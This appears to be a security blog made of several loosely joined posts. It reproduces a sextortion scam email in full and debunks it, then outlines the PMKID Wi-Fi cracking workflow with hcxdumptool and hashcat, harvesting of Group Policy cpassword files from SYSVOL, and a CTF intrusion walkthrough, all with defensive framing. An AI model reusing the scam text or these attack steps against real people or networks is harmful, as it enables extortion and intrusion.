Category: Securityexploits

Have you received an email saying your password has been stolen in broken English?

Subject: "Security Notice. Someone have access to you system"
As you may have noticed, I sent you an email from your account.
This means that I have full access to your acc: On moment of crack (youremail@youremaildomain.com) password: jfwqu6qoizxahofj0qkw
You say: this is my, but old password!
Or: I will change my password at any time!
Of course! You will be right,
but the fact is that when you change the password, my malicious code every time saved a new one!
I've been watching you for a few months now.
But the fact is that you were infected with malware through an adult site that you visited.
If you are not familiar with this, I will explain.
Trojan Virus gives me full access and control over a computer or other device.
This means that I can see everything on your screen, turn on the camera and microphone, but you do not know about it.
I also have access to all your contacts and all your correspondence from e-mail and messangers.
Why your antivirus did not detect my malware?
Answer: My malware uses the driver, I update its signatures every 4 hours so that your antivirus is silent.
I made a video showing how you satisfy yourself in the left half of the screen, and in the right half you see the video that you watched.
With one click of the mouse, I can send this video to all your emails and contacts on social networks. I can also post access to all your e-mail correspondence and messengers that you use.
If you want to prevent this, transfer the amount of $770 to my bitcoin address (if you do not know how to do this, write to Google: "Buy Bitcoin").
My bitcoin address (BTC Wallet) is: 1MrUDSrZiqD3ijxsBUPt2SukoFy534orP2
After receiving the payment, I will delete the video and you will never hear me again.
I give you 48 hours to pay.
I have a notice reading this letter, and the timer will work when you see this letter.
Filing a complaint somewhere does not make sense because this email cannot be tracked like my bitcoin address.
I do not make any mistakes.

—————————————————–

So this trickster extortionist actually makes several mistakes (besides the spelling errors).

First of all the email says ” As you may have noticed, I sent you an email from your account.” there is a basic issue with this statement. All email can be ‘spoofed’ thus making it a form of spam. Spoofed means all text in the ‘From:’ means nothing it can be changed to whatever the spammer wants to make it look like. (In fact you can change your From field yourself if you choose as an experiment)

So if your email is “youremail@emaildomain.com” then the spammer can make it look that way.

The other problem the spammer sextortionist has is they have to make assumptions of a video camera that is on the computer.

What if there is no video camera on the computer? then how can the video sextortion work?

So the scammer makes several assumptions:

you don’t know about From spoofing

ignore misspelling and bad grammar

email owner used porn

email owner has videocam functioning on the computer

at one time there was a password that is included in email

knows enough about bitcoin or can learn how to transfer money into bitcoin

Those are a lot of assumptions, and on top of that the scammer is leaving an electronic trail in Bitcoin or at least how they access bitcoin(we will not go into detail of how this is done). The scammer leaves an electronic trail as to how they access bitcoin to experienced investigators, which is why you should goto bitcoinabuse website and file a report (link below).

One thing people should do is to see how many others this has happened to and to decide what to do from here Internet Storm Center also had one of these (i.e. google or startpage.com a portion of the email and see what comes up).

What did I do you may ask? Of course you NEVER pay the extortionist. But one can also help the Internet denizens to reduce this type of email: goto Bitcoin Abuse website

Go to the website and File a report by adding the bitcoin address that is included in the email so that law enforcement and other people who track and try to find these spammers can start to do something about it.

Or you can View a report with the bitcoin address to see how many others has this email gone to?? check the FAQ on bitcoinabuse.com

So the short story is the scammers have accumulated a lot of money in hundreds(434) Bitcoin addresses which slowly started to move the money into a few addresses, as much as $21.5mil plus $18.5mil . Then from there the bitcoin addresses will be “mixed” so experts like in the link above will not be able to tell where the money goes (anonymity) using bestmixer.io.

So again please do not pay these scammers if you receive an email like the one included in this blog.

This attack does not even need a full EAPOL 4-way handshake, EAPOL stands for Extensible Authentication Protocol(EAP) over LAN. A simple 4-way handshake is shown pictorially below (from hitchhikersguidetolearning.com)

This means that in the past an attack on Wi-Fi would would need EAPOL 4-way handshake to be captured. Capturing the 4-way handshake is sometimes difficult to achieve.

Instead in this attack: ” We receive all the data we need in the first EAPOL frame from the AP.”

First one captures a sample initial Message from the ‘Authenticator’ which includes a PMKID (run hcxdumptool)

Second (run hcxpcaptool) to convert captured data from pcapng format to a hash format accepted by hashcat

Third (run hashcat) to crack the string of data.

So now no 4-way handshake is needed, only expertise to run a couple of scripts and to know how to set up the Wi-Fi capture by using the Wi-Fi network card.

The comments on the hashcat webpage do mention that your Wi-Fi network card must have the capability to capture wlan traffic.

Like this:

We as Cybersecurity practitioners must use the best tools we can find. So if AI(Artificial Intelligence) can help us we need to use them.

Of course we have to use real AI tools, not old tools renamed “AI” to sell more software for a little bit of time.

What is the definition of AI ? a machine software (i.e. no human modification) that imitates human behavior. Or a branch of computer science dealing with simulation of intelligent behavior in computers.

So a true AI Cybersecurity is a program running attack or defense for the network or computer without human interaction.

What in today’s environment shows small views of intelligence? Bots and viruses of course.

It is also my opinion that future AI will first come as more sophisticated “Bots” or infectious software:

What makes this vulnerability bad is that it is a remote execution vulnerability. “Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.” (from NIST link).

So if an AI program can program itself to infect and take over other machines to both infect other machines and perform other goals (like mine crypto currencies the latest actions in this exploit for example) then it is easily done when people find ways not to patch their software.

Image example of CVE-2017-10271 as it was found

The key is to patch your machines, and we have to develop “Blue team” AI first in this coming “AI war”

To be a bit clearer (as mud I am sure) As someone programs an attack program to do the 3 things mentioned:

Find vulnerability

Exploit vulnerability and make money with cryptocurrencies on your machines.

Propagate the program as much as possible

So the future in AI (the real scary part) is when a truly non-human fully automated attack program does all 3 items and improves. The danger in how it will act is still not fully realized yet. I.e. we are not sure how bad it will get.

The important piece of this puzzle is the exponential level of improvement a fully electronic AI could do.

Some people have talked about the ‘singularity’ moment when an AI will have more capabilities than a human brain(supposedly sometime in 2020s).

What about a Cybersecurity ‘singularity’ moment? When a improving attack program starts to improve so fast that it morphs into something that is difficult to stop.

The problems solved in our shows apparently are remembered with ‘calls for action’ are the ones solved by individuals.

So maybe after a lifetime of watching these shows we have a predisposed subconscious notion to assume 1 person can solve most problems in a reasonable amount of time (1 hour or 2 hours).

So when a complex issue is placed in front of us such as

Red vs Blue teams attackers vs defenders where a series of steps breach a server and then use more tools to keep access of the system without the defending teams knowledge. The solution to this issue is not obvious.

So Why am I beating this horse again? Because the principle will not go away. The attackers will find ways and use the systems we have to attack us.

For example… we want to defend our SQL servers, maybe by hiding them. But this will not work, as there are tools to ask our systems “what are the SQL servers”? And our computers dutifully answer this request.

Technical Example: Do you have a domain controller? Which is automatically running Active Directory? The program that runs your network and username and password authentication.

Then how do you defend against a user asking various questions to your DC(Domain Controller) with some commands?

You can access Powershell from a command line, and then ask various questions (execute commands) like get-service or get-process to find out what services and processes are running on the system.

Why is this important? Because you can pick a service running on the system and then try to see what users have access to this service with another tool PowerMemory for example (as the tool(RWMC) in this article is no longer supported)

Let’s say that you got the user to click on phishing malware and now a command line shell was opened, and connects back to one of the Command and Control servers. techtarget.com explains this phenomena

Once the hacker has a command line opened (however they did it). Now they will try and get more access – by obtaining the passwords for administrator accounts.

The credentials can be taken from .xml files on any windows systems. If the system is in a domain then it will have a local user account and whoever logged into that particular system.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

So the hacker knows where to look and what to find… the .xml files with CPassword variable, which has the password stored in an encrypted format.

So now it only depends on how strong your password is…

What are your password schema characteristics? Do you require long passwords? more than 14 digits? Because if you have less than 14 digits the hackers will have an even easier time to get your passwords.

So is it still easy? Can you depend on only your defense team (Blue team) to keep all of your assets without unauthorized access? It will take more than a single episode, a season of episodes. It will take a marathon of binge watching to keep the hackers away. It will take red teams (ethical hackers) to attack.

we can help you with a plan of security policies and red team attacks.

I have been watching the Derbycon videos (put up by IronGeek) and I like Paul Coggin’s comment: Are you worried about Day zero attacks? You have to take care of 80 day first.

I have heard Paul’s talks before and this one in Derbycon is a bit different, but the theme is the same – do not forget the lvl2 OSI exploits and threats. This means that the Cisco devices can be attacked if not configured properly. This is obvious to him as he is the pentester versus Cisco routers.

Kind of funny as Paul says(as a side note) : “many companies are worried about Zero Day attacks but have not solved the 80 day attack”.

It is a valid point Paul, if we do not have our patching process set up correctly we are not catching the 80 day old vulnerability not to even mention the Zero-day(we can’t catch that one) but important to note we should not focus on the Zero-day vulnerability since there is nothing to do about them.

Derbycon had a CTF (capture the flag) competition as well which means there was a contest that had a real life hackers riddle … and solution that shows you some of the thought processes when a hacker makes on a take over of a machine.

At Derbycon’s CTF event the test hack uses the same process as a criminal hacker would in the real world

“Hacker Process”: also called a Kill Chain – Recon – Analysis – Penetrate – Control we like to call it SVAPE&C.

Walking through the thought processes of the Hacker as they are performing their actions is important to design better defenses.

The red team (attackers) versus the blue team (defense) is the constant in the world of Computer security, so therefore there are these contests of CTF.

I don’t want to get into too many details, but a few are necessary:

In a capture the flag contest there is a lot of network traffic that the hacker (red team) has to digest and make sense of. Decide what traffic is useful and what system to review closer.

System HELPDESK was found(with wireshark trafficsniffing) and it had ports 139 /tcp and 3456/tcp open (means Microsoft share ports) with nmap scanner

Then a nbtscan was done to find out more information from the system

Then a ping was done – which also gives out information

the port 139 was Microsoft

Port 3456 was odd so ncat was run to probe the port

Here the CTF oddities response came just like the “War games ” movie in the 90’s “WOULD YOU LIKE TO PLAY A GAME?”

From here the hack is now in a different stage having done reconnaissance and found the system and ports open.

So as you see in the Tweet the next point was to give a programmatic response to the port 3456 (even the port number is funny as there is no port service with that name. As a hacker participating in the ctf once you saw that tweet now you know what to answer the question.

The issue now was how to penetrate the box.

The str$() response did not work correctly

Hackers do what they do – and “hack” i.e. try different things until succeeding

Through some tricks they were able to start a command.com dos command (after realizing this may be an old machine and the new hack tools do not work)

Once the hacker can execute commands on the remote system what happens next? It is the “control” piece.

Now the hacker downloads hacking tools needed to truly control the machine. (ncat and registry program)

From there they had to find the FlagMalwareBytes registry flag in the time allotted.

This particular team placed 3rd.

There is more to the CTF event but at this point I want to discuss the general nature of hacking. It is true in this case the hacker was trying to control an ancient machine (windows98 or 95 even) but the principles are the same. In fact due to the nature of the old machines the hackers had to use older tools.

The one thing that we need to take as a lesson (no matter the system) is that most attack hacks try to download tools and other items to the system to be compromised. And it usually will be with manual commands ftp or wget.

So if you can review any manual tool commands running in your network that would be good. Patching the local systems from all vulnerabilities gives you more defense against wily hackers.